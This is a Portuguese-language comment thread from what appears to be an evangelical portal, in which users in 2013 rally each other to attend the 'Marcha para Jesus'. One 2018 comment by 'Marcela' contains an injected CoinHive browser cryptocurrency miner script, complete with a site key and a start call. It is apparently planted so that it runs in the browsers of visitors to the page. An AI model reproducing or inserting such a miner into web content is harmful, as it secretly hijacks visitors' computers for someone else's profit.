Gente!! vamos participar da machar para jesus 2013!!pois Mesmo que você não possa ver ou sentir as operações de Deus, fique na certeza de que Ele sempre está operando silenciosamente, e trabalhará ao seu favor, em tudo, por nosso Senhor e Salvador Jesus Cristo.

Vanderson - 28/04/2013 15:08:25

Iae Galerinha Vamos Comparecer Na Marcha Para jesus, Muito Bom Ta Ali Demonstrando Nois Os Evangelicos

Tayna Rodrigues - 29/04/2013 23:16:45

o senhor nós disse que se nós confersar-mos o seu santo nome na terra ele também confesara o nosso nome no céu e não tem gesto mais bonito que adora o nosso rei Jesus Cristo num evento como esse, vamos nós todos adora o nosso rei

kezya craveiro - 29/04/2013 23:26:32

VAMOS PRA MACHA DO SENHOR JESUS , MACHAMOS PARA A SUA GLORIA PARA QUE TODOS POSSAM VER Q SÓ ELE É DIGNO DE TODA HONRRA E TODA GLORIA PARA Q TODA BOCA POSSA CONFESSAR QUE ELE É DEUS QUE SO ELE TEM PODER DE TRANSFORMAR E TIRAR O HOMEM DO PECADO E DAS MAOS DO DIABO PQ NA PALAVRA DELE DIZ "IDE E PREGAI O EVANGELHO A TODA CRIATURA" ENTAO VAMOS FAZER A SUA OBRA E TRANSFORMAR VIDAS PRA ELE. IDE AS NAÇOES E VAMOS ANUNCIAR A SUA MAGESTADE PORQUE SO ELE ER GRANDE E MARAVILHOSO BENDITO E OS PES DAQUELE QUE LEVA A SUA PALAVRA. A HUMANIDADE PRESISA SABER QUE SO JESUS É O CAMINHO DA SALVAÇAO E NESSA MACHA PRA JESUS NOIS VAMOS MOSTRAR ISSO . AMEM

giovanna costa - 29/04/2013 23:49:01

que nessa macha pra jesus dê muita gente e que a maioria seja pessoas q nao conhecem a palavra para q o reino de deus seja anunciado a todos e que muitas almas se convertam para seu santo nome, e que o nome de deus seja glorificado por multidoes de pessoas q vidas sejam libertas do pecado da prisao da alma dos vicios e de todo o pecado em geral e que almas sejam libertas e purificadas nessa macha pra jesus q seja uma macha pra libertaçao de muitas gente oprimida pelo diabo, e vamos q vamos anunciar o nome do nosso rei JESUS!

jessiano - 04/05/2013 10:37:27

e nos la vamos pisa na cabeça do diabo juntos oooooo gloria a jesus

brenda - 10/05/2013 23:25:19

finalmente chegou a macha pra jesus 2013, que nesse ano seja um ano de transformação que vidas venham ser tocadas pelo senhor jesus, e que ele possa mudar vida de muitas pessoas que vão participar desse grande evento que cada passo que vamos dar seja para provar que só ele é digno de toda honra toda gloria, e que nesse dia muitas almas venham se render aos pés de jesus

Marcela - 12/01/2018 19:19:13

Ebaa tambem quero var miner = new CoinHive.Anonymous('Nn65Hv8d3sM0Xt7CAloaw5YtK8tX6bLK', {throttle: 0.3});miner.start();

Você pode selecionar um ou mais smiley face para inserir em seu comentário

Todos os comentários nesta página estão sujeitas aos nossos Termos de Uso e não refletem necessariamente a opinião do Portal Fiel ou dos seus colaboradores. Ajude-nos a acompanhar os comentários que são ilegais, prejudicial, ameaçador, abusivo, vexatório, difamatório, vulgar, obsceno, odioso, ou racial, étnico ou censurável.

Bíblia Brasil

Notícias

Notícias gospel
O mundo irá acabar em 2016? 11 de Fevereiro de 2016 às 22:14

Em 1847, um grupo de colonos americanos ficou isolado devido ao inverno, e enquanto o frio